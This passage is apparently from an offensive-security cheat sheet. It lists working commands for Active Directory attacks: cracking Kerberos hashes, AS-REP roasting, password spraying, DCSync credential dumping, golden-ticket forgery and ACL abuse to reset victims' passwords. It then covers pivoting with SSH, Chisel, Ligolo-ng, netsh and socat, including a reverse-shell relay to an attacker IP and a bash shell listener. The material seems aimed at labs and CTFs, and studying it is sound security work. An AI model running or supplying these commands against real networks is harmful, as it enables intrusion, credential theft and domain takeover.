hashcat -m 13100 tickets.txt rockyou.txt
AS-REP Roasting
# Users with Kerberos pre-auth disabled — get crackable hash without password
python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.1 -no-pass
# Crack with hashcat
hashcat -m 18200 asrep_hashes.txt rockyou.txt
Password Spraying
# CrackMapExec — spray one password across all users (avoid lockout)
crackmapexec smb 10.10.10.1 -u users.txt -p 'Password123' --continue-on-success
# Kerbrute — fast Kerberos-based spray (no failed logon events)
kerbrute passwordspray -d domain.local --dc 10.10.10.1 users.txt 'Password123'
DCSync Attack
# Requires Domain Admin or replication rights
# Dump all hashes from DC
python3 secretsdump.py domain.local/admin:password@10.10.10.1
# Via Mimikatz (on Windows)
lsadump::dcsync /domain:domain.local /all /csv
lsadump::dcsync /domain:domain.local /user:krbtgt # just krbtgt hash
Golden Ticket
# Requires krbtgt hash — forge TGT for any user, any time
# Get krbtgt hash via DCSync first
# Mimikatz
kerberos::golden /user:administrator /domain:domain.local \
/sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi
# Impacket — use the ticket
export KRB5CCNAME=golden.ccache
python3 psexec.py domain.local/administrator@dc.domain.local -k -no-pass
Common AD Misconfigurations
# GenericAll / GenericWrite on user → reset their password
python3 changepasswd.py domain.local/attacker:password@10.10.10.1 -newpass 'Hacked123!' -altuser victim
# WriteDACL on domain → grant DCSync rights
python3 dacledit.py domain.local/user:password -dc-ip 10.10.10.1 -action write \
-rights DCSync -principal attacker -target-dn "DC=domain,DC=local"
# ForceChangePassword → change user password without knowing current
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force)
Pivoting & Tunnelling
SSH Tunnelling
# Local port forwarding — forward remote service to local port
# Access remote 192.168.1.10:80 via localhost:8080
ssh -L 8080:192.168.1.10:80 user@jumphost
# Dynamic port forwarding — SOCKS proxy through SSH
ssh -D 1080 user@jumphost
# Then use proxychains: proxychains nmap -sT 192.168.1.0/24
# Remote port forwarding — expose local port on remote host
ssh -R 4444:localhost:4444 user@attacker
# SSH through a jump host
ssh -J user@jumphost user@internal_host
Proxychains
# Configure /etc/proxychains.conf
# Add: socks5 127.0.0.1 1080
# Use any tool through the proxy
proxychains nmap -sT -Pn 192.168.1.1
proxychains curl http://192.168.1.1
proxychains python3 exploit.py
Chisel
# Fast TCP tunnel over HTTP — great for restricted environments
# Attacker (server mode)
./chisel server -p 8080 --reverse
# Target (client mode) — reverse SOCKS proxy
./chisel client 10.10.14.5:8080 R:socks
# Forward specific port
./chisel client 10.10.14.5:8080 R:3306:127.0.0.1:3306
Ligolo-ng
# Modern pivoting tool — creates a TUN interface
# Attacker — start proxy
./proxy -selfcert
# Target — connect agent
./agent -connect 10.10.14.5:11601 -ignore-cert
# On attacker — add route to internal network
ip route add 192.168.1.0/24 dev ligolo
# Start tunnel in ligolo UI: session → start
Netsh (Windows Port Forwarding)
# Forward incoming connections to internal host
netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=4444 connectaddress=192.168.1.10
# View rules
netsh interface portproxy show all
# Remove rule
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=0.0.0.0
Socat
# Port forwarding
socat TCP-LISTEN:8080,fork TCP:192.168.1.10:80
# Reverse shell relay
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444
# Encrypted shell listener
socat OPENSSL-LISTEN:4444,cert=cert.pem,verify=0,fork EXEC:/bin/bash
For SUID/capability binary exploitation, always check GTFOBins. For Windows binaries, check LOLBAS.